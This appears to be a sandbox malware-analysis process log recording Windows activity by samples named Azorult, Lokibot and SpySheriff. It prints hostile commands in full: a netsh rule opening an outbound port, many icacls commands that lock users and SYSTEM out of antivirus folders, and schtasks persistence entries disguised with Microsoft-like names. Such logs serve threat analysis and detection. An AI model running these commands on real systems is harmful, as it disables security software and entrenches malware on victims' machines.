- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="AllowPort4" protocol=TCP localport=9393 action=allow dir=out
    3⤵
    PID:5916
  - - C:\Windows\SysWOW64\netsh.exe
      netsh advfirewall firewall add rule name="AllowPort4" protocol=TCP localport=9393 action=allow dir=out
      4⤵
      Modifies Windows Firewall
      PID:1772
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Microsoft JDX" /deny %username%:(OI)(CI)(F)
    3⤵
    PID:956
  - - C:\Windows\SysWOW64\icacls.exe
      icacls "C:\Program Files (x86)\Microsoft JDX" /deny Admin:(OI)(CI)(F)
      4⤵
      Modifies file permissions
      PID:4600
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Microsoft JDX" /deny System:(OI)(CI)(F)
    3⤵
    PID:3448
  - - C:\Windows\SysWOW64\icacls.exe
      icacls "C:\Program Files (x86)\Microsoft JDX" /deny System:(OI)(CI)(F)
      4⤵
      Modifies file permissions
      PID:4972
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Common Files\System\iediagcmd.exe" /deny %username%:(OI)(CI)(F)
    3⤵
    PID:2260
  - - C:\Windows\SysWOW64\icacls.exe
      icacls "C:\Program Files\Common Files\System\iediagcmd.exe" /deny Admin:(OI)(CI)(F)
      4⤵
      Modifies file permissions
      PID:2312
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Common Files\System\iediagcmd.exe" /deny System:(OI)(CI)(F)
    3⤵
    PID:2936
  - - C:\Windows\SysWOW64\icacls.exe
      icacls "C:\Program Files\Common Files\System\iediagcmd.exe" /deny System:(OI)(CI)(F)
      4⤵
      Modifies file permissions
      PID:5572
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c icacls "C:\Windows\svchost.exe" /deny %username%:(OI)(CI)(F)
    3⤵
    PID:1552
  - - C:\Windows\SysWOW64\icacls.exe
      icacls "C:\Windows\svchost.exe" /deny Admin:(OI)(CI)(F)
      4⤵
      Modifies file permissions
      PID:5376
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c icacls "C:\Windows\svchost.exe" /deny system:(OI)(CI)(F)
    3⤵
    PID:4828
  - - C:\Windows\SysWOW64\icacls.exe
      icacls "C:\Windows\svchost.exe" /deny system:(OI)(CI)(F)
      4⤵
      Modifies file permissions
      PID:4992
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c icacls "c:\programdata\microsoft\clr_optimization_v4.0.30318_64" /deny %username%:(OI)(CI)(F)
    3⤵
    PID:3380
  - - C:\Windows\SysWOW64\icacls.exe
      icacls "c:\programdata\microsoft\clr_optimization_v4.0.30318_64" /deny Admin:(OI)(CI)(F)
      4⤵
      Modifies file permissions
      PID:5844
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c icacls "c:\programdata\microsoft\clr_optimization_v4.0.30318_64" /deny System:(OI)(CI)(F)
    3⤵
    PID:3364
  - - C:\Windows\SysWOW64\icacls.exe
      icacls "c:\programdata\microsoft\clr_optimization_v4.0.30318_64" /deny System:(OI)(CI)(F)
      4⤵
      Modifies file permissions
      PID:4064
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c icacls "C:\Windows\Fonts\Mysql" /deny %username%:(OI)(CI)(F)
    3⤵
    PID:4552
  - - C:\Windows\SysWOW64\icacls.exe
      icacls "C:\Windows\Fonts\Mysql" /deny Admin:(OI)(CI)(F)
      4⤵
      Modifies file permissions
      PID:4488
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c icacls "C:\Windows\Fonts\Mysql" /deny System:(OI)(CI)(F)
    3⤵
    PID:4624
  - - C:\Windows\SysWOW64\icacls.exe
      icacls "C:\Windows\Fonts\Mysql" /deny System:(OI)(CI)(F)
      4⤵
      Modifies file permissions
      PID:2120
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c icacls "c:\program files\Internet Explorer\bin" /deny %username%:(OI)(CI)(F)
    3⤵
    PID:4816
  - - C:\Windows\SysWOW64\icacls.exe
      icacls "c:\program files\Internet Explorer\bin" /deny Admin:(OI)(CI)(F)
      4⤵
      Modifies file permissions
      PID:900
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c icacls "c:\program files\Internet Explorer\bin" /deny system:(OI)(CI)(F)
    3⤵
    PID:6140
  - - C:\Windows\SysWOW64\icacls.exe
      icacls "c:\program files\Internet Explorer\bin" /deny system:(OI)(CI)(F)
      4⤵
      Modifies file permissions
      PID:5472
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Zaxar" /deny %username%:(OI)(CI)(F)
    3⤵
    PID:2404
  - - C:\Windows\SysWOW64\icacls.exe
      icacls "C:\Program Files (x86)\Zaxar" /deny Admin:(OI)(CI)(F)
      4⤵
      Modifies file permissions
      PID:3388
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Zaxar" /deny system:(OI)(CI)(F)
    3⤵
    PID:4076
  - - C:\Windows\SysWOW64\icacls.exe
      icacls "C:\Program Files (x86)\Zaxar" /deny system:(OI)(CI)(F)
      4⤵
      Modifies file permissions
      PID:5748
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c icacls C:\Windows\speechstracing /deny %username%:(OI)(CI)(F)
    3⤵
    PID:4104
  - - C:\Windows\SysWOW64\icacls.exe
      icacls C:\Windows\speechstracing /deny Admin:(OI)(CI)(F)
      4⤵
      Modifies file permissions
      PID:3596
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c icacls C:\Windows\speechstracing /deny system:(OI)(CI)(F)
    3⤵
    PID:5060
  - - C:\Windows\SysWOW64\icacls.exe
      icacls C:\Windows\speechstracing /deny system:(OI)(CI)(F)
      4⤵
      Modifies file permissions
      PID:1928
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c icacls c:\programdata\Malwarebytes /deny %username%:(F)
    3⤵
    PID:5736
  - - C:\Windows\SysWOW64\icacls.exe
      icacls c:\programdata\Malwarebytes /deny Admin:(F)
      4⤵
      Modifies file permissions
      PID:1040
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c icacls c:\programdata\Malwarebytes /deny System:(F)
    3⤵
    PID:6040
  - - C:\Windows\SysWOW64\icacls.exe
      icacls c:\programdata\Malwarebytes /deny System:(F)
      4⤵
      Modifies file permissions
      PID:3724
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c icacls C:\Programdata\MB3Install /deny %username%:(F)
    3⤵
    PID:2144
  - - C:\Windows\SysWOW64\icacls.exe
      icacls C:\Programdata\MB3Install /deny Admin:(F)
      4⤵
      Modifies file permissions
      PID:4144
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c icacls C:\Programdata\MB3Install /deny System:(F)
    3⤵
    PID:2872
  - - C:\Windows\SysWOW64\icacls.exe
      icacls C:\Programdata\MB3Install /deny System:(F)
      4⤵
      Modifies file permissions
      PID:3420
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c icacls C:\Programdata\Indus /deny %username%:(OI)(CI)(F)
    3⤵
    PID:4264
  - - C:\Windows\SysWOW64\icacls.exe
      icacls C:\Programdata\Indus /deny Admin:(OI)(CI)(F)
      4⤵
      Modifies file permissions
      PID:4212
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c icacls C:\Programdata\Indus /deny System:(OI)(CI)(F)
    3⤵
    PID:1736
  - - C:\Windows\SysWOW64\icacls.exe
      icacls C:\Programdata\Indus /deny System:(OI)(CI)(F)
      4⤵
      Modifies file permissions
      PID:808
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c icacls "C:\Programdata\Driver Foundation Visions VHG" /deny %username%:(OI)(CI)(F)
    3⤵
    PID:3948
  - - C:\Windows\SysWOW64\icacls.exe
      icacls "C:\Programdata\Driver Foundation Visions VHG" /deny Admin:(OI)(CI)(F)
      4⤵
      Modifies file permissions
      PID:5100
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c icacls "C:\Programdata\Driver Foundation Visions VHG" /deny System:(OI)(CI)(F)
    3⤵
    PID:864
  - - C:\Windows\SysWOW64\icacls.exe
      icacls "C:\Programdata\Driver Foundation Visions VHG" /deny System:(OI)(CI)(F)
      4⤵
      Modifies file permissions
      PID:6120
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c icacls C:\AdwCleaner /deny %username%:(OI)(CI)(F)
    3⤵
    PID:4840
  - - C:\Windows\SysWOW64\icacls.exe
      icacls C:\AdwCleaner /deny Admin:(OI)(CI)(F)
      4⤵
      Modifies file permissions
      PID:4540
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\ByteFence" /deny %username%:(OI)(CI)(F)
    3⤵
    PID:4620
  - - C:\Windows\SysWOW64\icacls.exe
      icacls "C:\Program Files\ByteFence" /deny Admin:(OI)(CI)(F)
      4⤵
      Modifies file permissions
      PID:3136
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c icacls C:\KVRT_Data /deny %username%:(OI)(CI)(F)
    3⤵
    PID:3200
  - - C:\Windows\SysWOW64\icacls.exe
      icacls C:\KVRT_Data /deny Admin:(OI)(CI)(F)
      4⤵
      Modifies file permissions
      PID:2312
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c icacls C:\KVRT_Data /deny system:(OI)(CI)(F)
    3⤵
    PID:5780
  - - C:\Windows\SysWOW64\icacls.exe
      icacls C:\KVRT_Data /deny system:(OI)(CI)(F)
      4⤵
      Modifies file permissions
      PID:5260
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\360" /deny %username%:(OI)(CI)(F)
    3⤵
    PID:5792
  - - C:\Windows\SysWOW64\icacls.exe
      icacls "C:\Program Files (x86)\360" /deny Admin:(OI)(CI)(F)
      4⤵
      Modifies file permissions
      PID:5212
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\360safe" /deny %username%:(OI)(CI)(F)
    3⤵
    PID:5940
  - - C:\Windows\SysWOW64\icacls.exe
      icacls "C:\ProgramData\360safe" /deny Admin:(OI)(CI)(F)
      4⤵
      Modifies file permissions
      PID:5864
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\SpyHunter" /deny %username%:(OI)(CI)(F)
    3⤵
    PID:2780
  - - C:\Windows\SysWOW64\icacls.exe
      icacls "C:\Program Files (x86)\SpyHunter" /deny Admin:(OI)(CI)(F)
      4⤵
      Modifies file permissions
      PID:1716
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Malwarebytes" /deny %username%:(OI)(CI)(F)
    3⤵
    PID:2184
  - - C:\Windows\SysWOW64\icacls.exe
      icacls "C:\Program Files\Malwarebytes" /deny Admin:(OI)(CI)(F)
      4⤵
      Modifies file permissions
      PID:5324
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\COMODO" /deny %username%:(OI)(CI)(F)
    3⤵
    PID:5836
  - - C:\Windows\SysWOW64\icacls.exe
      icacls "C:\Program Files\COMODO" /deny Admin:(OI)(CI)(F)
      4⤵
      Modifies file permissions
      PID:5740
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Enigma Software Group" /deny %username%:(OI)(CI)(F)
    3⤵
    PID:3700
  - - C:\Windows\SysWOW64\icacls.exe
      icacls "C:\Program Files\Enigma Software Group" /deny Admin:(OI)(CI)(F)
      4⤵
      Modifies file permissions
      PID:1096
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\SpyHunter" /deny %username%:(OI)(CI)(F)
    3⤵
    PID:3724
  - - C:\Windows\SysWOW64\icacls.exe
      icacls "C:\Program Files\SpyHunter" /deny Admin:(OI)(CI)(F)
      4⤵
      Modifies file permissions
      PID:5292
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\AVAST Software" /deny %username%:(OI)(CI)(F)
    3⤵
    PID:4856
  - - C:\Windows\SysWOW64\icacls.exe
      icacls "C:\Program Files\AVAST Software" /deny Admin:(OI)(CI)(F)
      4⤵
      Modifies file permissions
      PID:5952
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\AVAST Software" /deny %username%:(OI)(CI)(F)
    3⤵
    PID:4868
  - - C:\Windows\SysWOW64\icacls.exe
      icacls "C:\Program Files (x86)\AVAST Software" /deny Admin:(OI)(CI)(F)
      4⤵
      Modifies file permissions
      PID:1768
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c icacls "C:\Programdata\AVAST Software" /deny %username%:(OI)(CI)(F)
    3⤵
    PID:6112
  - - C:\Windows\SysWOW64\icacls.exe
      icacls "C:\Programdata\AVAST Software" /deny Admin:(OI)(CI)(F)
      4⤵
      Modifies file permissions
      PID:2268
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\AVG" /deny %username%:(OI)(CI)(F)
    3⤵
    PID:4264
  - - C:\Windows\SysWOW64\icacls.exe
      icacls "C:\Program Files\AVG" /deny Admin:(OI)(CI)(F)
      4⤵
      Modifies file permissions
      PID:5332
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\AVG" /deny %username%:(OI)(CI)(F)
    3⤵
    PID:3948
  - - C:\Windows\SysWOW64\icacls.exe
      icacls "C:\Program Files (x86)\AVG" /deny Admin:(OI)(CI)(F)
      4⤵
      Modifies file permissions
      PID:5356
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Norton" /deny %username%:(OI)(CI)(F)
    3⤵
    PID:4792
  - - C:\Windows\SysWOW64\icacls.exe
      icacls "C:\ProgramData\Norton" /deny Admin:(OI)(CI)(F)
      4⤵
      Modifies file permissions
      PID:5312
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c icacls "C:\Programdata\Kaspersky Lab" /deny %username%:(OI)(CI)(F)
    3⤵
    PID:5008
  - - C:\Windows\SysWOW64\icacls.exe
      icacls "C:\Programdata\Kaspersky Lab" /deny Admin:(OI)(CI)(F)
      4⤵
      Modifies file permissions
      PID:5680
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c icacls "C:\Programdata\Kaspersky Lab" /deny system:(OI)(CI)(F)
    3⤵
    PID:6076
  - - C:\Windows\SysWOW64\icacls.exe
      icacls "C:\Programdata\Kaspersky Lab" /deny system:(OI)(CI)(F)
      4⤵
      Modifies file permissions
      PID:5864
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Kaspersky Lab Setup Files" /deny %username%:(OI)(CI)(F)
    3⤵
    PID:1716
  - - C:\Windows\SysWOW64\icacls.exe
      icacls "C:\ProgramData\Kaspersky Lab Setup Files" /deny Admin:(OI)(CI)(F)
      4⤵
      Modifies file permissions
      PID:2784
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Kaspersky Lab Setup Files" /deny system:(OI)(CI)(F)
    3⤵
    PID:1248
  - - C:\Windows\SysWOW64\icacls.exe
      icacls "C:\ProgramData\Kaspersky Lab Setup Files" /deny system:(OI)(CI)(F)
      4⤵
      Modifies file permissions
      PID:2420
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Kaspersky Lab" /deny %username%:(OI)(CI)(F)
    3⤵
    PID:5544
  - - C:\Windows\SysWOW64\icacls.exe
      icacls "C:\Program Files\Kaspersky Lab" /deny Admin:(OI)(CI)(F)
      4⤵
      Modifies file permissions
      PID:2984
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Kaspersky Lab" /deny system:(OI)(CI)(F)
    3⤵
    PID:5060
  - - C:\Windows\SysWOW64\icacls.exe
      icacls "C:\Program Files\Kaspersky Lab" /deny system:(OI)(CI)(F)
      4⤵
      Modifies file permissions
      PID:2068
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Kaspersky Lab" /deny %username%:(OI)(CI)(F)
    3⤵
    PID:3936
  - - C:\Windows\SysWOW64\icacls.exe
      icacls "C:\Program Files (x86)\Kaspersky Lab" /deny Admin:(OI)(CI)(F)
      4⤵
      Modifies file permissions
      PID:1648
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Kaspersky Lab" /deny system:(OI)(CI)(F)
    3⤵
    PID:2144
  - - C:\Windows\SysWOW64\icacls.exe
      icacls "C:\Program Files (x86)\Kaspersky Lab" /deny system:(OI)(CI)(F)
      4⤵
      Modifies file permissions
      PID:4856
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Doctor Web" /deny %username%:(OI)(CI)(F)
    3⤵
    PID:2432
  - - C:\Windows\SysWOW64\icacls.exe
      icacls "C:\ProgramData\Doctor Web" /deny Admin:(OI)(CI)(F)
      4⤵
      Modifies file permissions
      PID:2864
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\grizzly" /deny %username%:(OI)(CI)(F)
    3⤵
    PID:5528
  - - C:\Windows\SysWOW64\icacls.exe
      icacls "C:\ProgramData\grizzly" /deny Admin:(OI)(CI)(F)
      4⤵
      Modifies file permissions
      PID:4424
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Cezurity" /deny %username%:(OI)(CI)(F)
    3⤵
    PID:4372
  - - C:\Windows\SysWOW64\icacls.exe
      icacls "C:\Program Files (x86)\Cezurity" /deny Admin:(OI)(CI)(F)
      4⤵
      Modifies file permissions
      PID:3856
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Cezurity" /deny %username%:(OI)(CI)(F)
    3⤵
    PID:2472
  - - C:\Windows\SysWOW64\icacls.exe
      icacls "C:\Program Files\Cezurity" /deny Admin:(OI)(CI)(F)
      4⤵
      Modifies file permissions
      PID:4728
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\McAfee" /deny %username%:(OI)(CI)(F)
    3⤵
    PID:3064
  - - C:\Windows\SysWOW64\icacls.exe
      icacls "C:\ProgramData\McAfee" /deny Admin:(OI)(CI)(F)
      4⤵
      Modifies file permissions
      PID:6028
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Common Files\McAfee" /deny %username%:(OI)(CI)(F)
    3⤵
    PID:6024
  - - C:\Windows\SysWOW64\icacls.exe
      icacls "C:\Program Files\Common Files\McAfee" /deny Admin:(OI)(CI)(F)
      4⤵
      Modifies file permissions
      PID:3380
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Avira" /deny %username%:(OI)(CI)(F)
    3⤵
    PID:4496
  - - C:\Windows\SysWOW64\icacls.exe
      icacls "C:\ProgramData\Avira" /deny Admin:(OI)(CI)(F)
      4⤵
      Modifies file permissions
      PID:3860
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\GRIZZLY Antivirus" /deny %username%:(OI)(CI)(F)
    3⤵
    PID:5220
  - - C:\Windows\SysWOW64\icacls.exe
      icacls "C:\Program Files (x86)\GRIZZLY Antivirus" /deny Admin:(OI)(CI)(F)
      4⤵
      Modifies file permissions
      PID:3700
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\ESET" /deny %username%:(OI)(CI)(F)
    3⤵
    PID:3440
  - - C:\Windows\SysWOW64\icacls.exe
      icacls "C:\Program Files\ESET" /deny Admin:(OI)(CI)(F)
      4⤵
      Modifies file permissions
      PID:4868
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\ESET" /deny system:(OI)(CI)(F)
    3⤵
    PID:5952
  - - C:\Windows\SysWOW64\icacls.exe
      icacls "C:\Program Files\ESET" /deny system:(OI)(CI)(F)
      4⤵
      Modifies file permissions
      PID:4212
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\ESET" /deny %username%:(OI)(CI)(F)
    3⤵
    PID:5812
  - - C:\Windows\SysWOW64\icacls.exe
      icacls "C:\ProgramData\ESET" /deny Admin:(OI)(CI)(F)
      4⤵
      Modifies file permissions
      PID:3856
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\ESET" /deny system:(OI)(CI)(F)
    3⤵
    PID:1508
  - - C:\Windows\SysWOW64\icacls.exe
      icacls "C:\ProgramData\ESET" /deny system:(OI)(CI)(F)
      4⤵
      Modifies file permissions
      PID:2484
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Panda Security" /deny %username%:(OI)(CI)(F)
    3⤵
    PID:4728
  - - C:\Windows\SysWOW64\icacls.exe
      icacls "C:\Program Files (x86)\Panda Security" /deny Admin:(OI)(CI)(F)
      4⤵
      Modifies file permissions
      PID:1544
- - C:\Windows\SysWOW64\schtasks.exe
    "C:\Windows\SysWOW64\schtasks.exe" /create /TN "Microsoft\Windows\Wininet\SystemC" /TR "C:\Programdata\RealtekHD\taskhostw.exe" /SC MINUTE /MO 1
    3⤵
    - Creates scheduled task(s)
    PID:1556
- - C:\Windows\SysWOW64\schtasks.exe
    "C:\Windows\SysWOW64\schtasks.exe" /create /TN "Microsoft\Windows\Wininet\Cleaner" /TR "C:\Programdata\WindowsTask\winlogon.exe" /SC ONLOGON /RL HIGHEST
    3⤵
    - Creates scheduled task(s)
    PID:5152
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1940,1079265899310737970,3819052658595715922,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5640 /prefetch:8
  2⤵
  - NTFS ADS
  PID:1932
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=1940,1079265899310737970,3819052658595715922,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=7228 /prefetch:8
  2⤵
  PID:5348
- C:\Users\Admin\Downloads\Azorult.exe
  "C:\Users\Admin\Downloads\Azorult.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of SetWindowsHookEx
  PID:2928
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1940,1079265899310737970,3819052658595715922,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=50 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6504 /prefetch:1
  2⤵
  PID:3008
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=1940,1079265899310737970,3819052658595715922,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=5472 /prefetch:8
  2⤵
  PID:1932
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1940,1079265899310737970,3819052658595715922,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4048 /prefetch:8
  2⤵
  - NTFS ADS
  PID:5004
- C:\Users\Admin\Downloads\Lokibot.exe
  "C:\Users\Admin\Downloads\Lokibot.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of SetThreadContext
  PID:4076
- - C:\Users\Admin\Downloads\Lokibot.exe
    "C:\Users\Admin\Downloads\Lokibot.exe"
    3⤵
    - Executes dropped EXE
    - Accesses Microsoft Outlook profiles
    - outlook_office_path
    - outlook_win_path
    PID:4956
- C:\Users\Admin\Downloads\Lokibot.exe
  "C:\Users\Admin\Downloads\Lokibot.exe"
  2⤵
  - Executes dropped EXE
  PID:5180
- C:\Users\Admin\Downloads\Lokibot.exe
  "C:\Users\Admin\Downloads\Lokibot.exe"
  2⤵
  - Executes dropped EXE
  PID:432
- C:\Users\Admin\Downloads\Lokibot.exe
  "C:\Users\Admin\Downloads\Lokibot.exe"
  2⤵
  - Executes dropped EXE
  PID:5008
- C:\Users\Admin\Downloads\Lokibot.exe
  "C:\Users\Admin\Downloads\Lokibot.exe"
  2⤵
  - Executes dropped EXE
  PID:4868
- C:\Users\Admin\Downloads\Lokibot.exe
  "C:\Users\Admin\Downloads\Lokibot.exe"
  2⤵
  - Executes dropped EXE
  PID:4640
- C:\Users\Admin\Downloads\Lokibot.exe
  "C:\Users\Admin\Downloads\Lokibot.exe"
  2⤵
  - Executes dropped EXE
  PID:5628
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1940,1079265899310737970,3819052658595715922,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=54 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5704 /prefetch:1
  2⤵
  PID:5372
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=1940,1079265899310737970,3819052658595715922,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=5436 /prefetch:8
  2⤵
  PID:5424
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1940,1079265899310737970,3819052658595715922,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3660 /prefetch:8
  2⤵
  - NTFS ADS
  PID:720
- C:\Users\Admin\Downloads\SpySheriff.exe
  "C:\Users\Admin\Downloads\SpySheriff.exe"
  2⤵
  - Executes dropped EXE
  PID:5728
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1940,1079265899310737970,3819052658595715922,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=57 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7360 /prefetch:1
  2⤵
  PID:5316
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1940,1079265899310737970,3819052658595715922,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=58 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3200 /prefetch:1
  2⤵
  PID:5420
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1940,1079265899310737970,3819052658595715922,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=59 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7548 /prefetch:1
  2⤵
  PID:5356
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1940,1079265899310737970,3819052658595715922,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=60 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7464 /prefetch:1
  2⤵
  PID:3948
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
